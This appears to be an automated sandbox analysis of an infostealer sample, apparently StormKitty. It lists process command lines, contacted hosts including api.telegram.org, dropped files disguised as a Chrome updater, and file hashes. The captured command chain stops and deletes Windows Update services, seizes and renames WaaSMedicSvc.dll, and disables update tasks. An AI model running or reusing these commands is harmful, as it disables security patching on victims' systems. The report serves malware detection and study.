"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

memory/2632-68-0x000000013F740000-0x000000013F790000-memory.dmp

memory/2232-69-0x000000013F270000-0x000000013F68E000-memory.dmp

memory/2232-70-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-71-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-72-0x0000000002160000-0x00000000021D4000-memory.dmp

memory/2232-73-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2632-74-0x00000000021D0000-0x00000000021D6000-memory.dmp

memory/1920-79-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1920-80-0x00000000027B0000-0x00000000027B8000-memory.dmp

memory/1920-81-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/1920-82-0x00000000027C0000-0x0000000002840000-memory.dmp

memory/1920-83-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/1920-84-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/2232-85-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-86-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2232-87-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2632-88-0x000000001B9A0000-0x000000001BA20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/2232-100-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat

MD5 e87b986da2d91d9cc2203e6f12bdb13d
SHA1 729e54e08a5cc0784f4d90220a8a1298a6410145
SHA256 44eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56
SHA512 6c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79

\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/1900-107-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-108-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-109-0x000000013FAD0000-0x000000013FEEE000-memory.dmp

memory/1900-110-0x000000001BCB0000-0x000000001BD30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

memory/1744-117-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1744-118-0x000000001B400000-0x000000001B6E2000-memory.dmp

memory/1744-119-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1744-121-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/1744-122-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1744-120-0x0000000002850000-0x00000000028D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

memory/1744-125-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1744-126-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1900-127-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-128-0x000000001BCB0000-0x000000001BD30000-memory.dmp

memory/1900-129-0x00000000007A0000-0x00000000007A6000-memory.dmp

memory/2028-130-0x0000000000060000-0x0000000000067000-memory.dmp

memory/2028-132-0x0000000000060000-0x0000000000067000-memory.dmp

memory/2028-134-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-135-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2028-136-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-137-0x0000000001B20000-0x0000000001B26000-memory.dmp

memory/2028-138-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-139-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-140-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2028-141-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-142-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-143-0x000000001A790000-0x000000001A810000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

memory/2352-149-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

memory/2352-150-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

memory/2352-151-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-152-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-153-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-154-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-155-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/2948-158-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2948-159-0x000000013F2C0000-0x000000013F6DE000-memory.dmp

memory/2948-160-0x000000001BCD0000-0x000000001BD50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 34dc4454196f0ad68db18c132e5e281c
SHA1 b0ce0637ccbe63c97177fa298098deb9a1207d91
SHA256 8ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995
SHA512 65cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2940-167-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2940-168-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-169-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-170-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2940-171-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-172-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2948-173-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2948-174-0x000000001BCD0000-0x000000001BD50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

memory/2948-177-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp